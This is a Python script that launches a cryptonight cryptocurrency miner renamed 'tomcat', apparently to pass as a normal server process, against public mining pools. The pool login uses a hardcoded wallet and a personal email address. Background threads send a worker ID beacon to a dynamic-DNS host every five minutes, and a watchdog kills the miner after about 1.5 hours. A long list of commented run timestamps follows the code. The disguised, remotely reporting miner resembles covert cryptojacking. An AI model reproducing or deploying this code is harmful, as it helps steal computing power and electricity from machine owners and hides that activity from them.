import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:04.895972
#2018-02-17 16:18:07.576538
#2018-02-17 18:05:06.513839
#2018-02-17 19:53:05.977642
#2018-02-17 21:42:07.843784
#2018-02-17 23:26:03.648457
#2018-02-18 01:16:06.275538
#2018-02-18 03:03:01.504193
#2018-02-18 04:52:03.478989
#2018-02-18 06:42:04.717495
#2018-02-18 08:31:03.543272
#2018-02-18 10:18:04.603652
#2018-02-18 12:04:06.472345
#2018-02-18 13:49:05.671547
#2018-02-18 15:40:08.288141
#2018-02-18 17:29:01.407389
#2018-02-18 19:16:06.059102
#2018-02-18 21:02:04.564282
#2018-02-18 22:48:04.407114
#2018-02-19 00:37:04.973055
#2018-02-19 02:23:03.682563
#2018-02-19 04:10:04.596035
#2018-02-19 05:54:06.773127
#2018-02-19 07:43:01.860049
#2018-02-19 09:32:08.121533
#2018-02-19 11:22:07.418345
#2018-02-19 13:09:04.824332
#2018-02-19 14:56:07.292241
#2018-02-19 16:43:03.998890
#2018-02-19 18:29:07.490649
#2018-02-19 20:16:06.019920
#2018-02-19 22:05:08.236263
#2018-02-19 23:51:03.849229
#2018-02-20 01:38:02.132174
#2018-02-20 03:26:01.667850
#2018-02-20 05:13:07.212247
#2018-02-20 06:57:01.665955
#2018-02-20 08:43:07.019486
#2018-02-20 10:27:07.980163
#2018-02-20 12:12:08.692437
#2018-02-20 14:01:08.239187
#2018-02-20 15:44:04.155255
#2018-02-20 17:31:01.801841
#2018-02-20 19:18:10.457555
#2018-02-20 21:06:06.834090
#2018-02-20 22:53:02.050054
#2018-02-21 00:35:01.814137
#2018-02-21 02:22:07.686319
#2018-02-21 04:08:06.681645
#2018-02-21 05:55:06.607948
#2018-02-21 07:43:12.187379
#2018-02-21 09:31:01.412998
#2018-02-21 11:19:08.657011
#2018-02-21 13:08:04.374739
#2018-02-21 14:54:07.642236
#2018-02-21 16:43:10.797571
#2018-02-21 18:33:09.454508
#2018-02-21 20:19:07.645903
#2018-02-21 22:09:05.549009
#2018-02-21 23:59:01.763702
#2018-02-22 01:46:07.662342
#2018-02-22 03:34:05.638255
#2018-02-22 05:20:07.880378
#2018-02-22 07:06:07.515304
#2018-02-22 08:54:05.462515
#2018-02-22 10:42:01.817904
#2018-02-22 12:30:09.805268
#2018-02-22 14:14:07.250922
#2018-02-22 16:03:04.711108
#2018-02-22 17:48:04.709030
#2018-02-22 19:35:07.993276
#2018-02-22 21:28:02.167433
#2018-02-22 23:14:07.936463
#2018-02-23 01:01:01.631800
#2018-02-23 02:48:01.895132
#2018-02-23 04:36:06.529153
#2018-02-23 06:22:01.374737
#2018-02-23 08:08:06.834524
#2018-02-23 10:23:06.600067
#2018-02-23 12:18:04.080301
#2018-02-23 14:08:01.463075
#2018-02-23 15:57:04.770865
#2018-02-23 17:42:04.429874
#2018-02-23 19:29:06.533383
#2018-02-23 21:12:06.359867
#2018-02-23 23:01:05.378937
#2018-02-24 00:47:08.104470
#2018-02-24 02:38:04.835753
#2018-02-24 04:32:05.655520
#2018-02-24 06:16:07.736184
#2018-02-24 08:04:05.683372
#2018-02-24 09:48:05.409335
#2018-02-24 11:43:07.381256
#2018-02-24 13:34:05.471428
#2018-02-24 15:21:06.708151
#2018-02-24 17:11:05.981801
#2018-02-24 19:04:07.746783
#2018-02-24 20:52:06.784831
#2018-02-24 23:12:05.933912
#2018-02-25 02:25:09.062022
#2018-02-25 06:09:03.827735
#2018-02-25 11:38:05.109296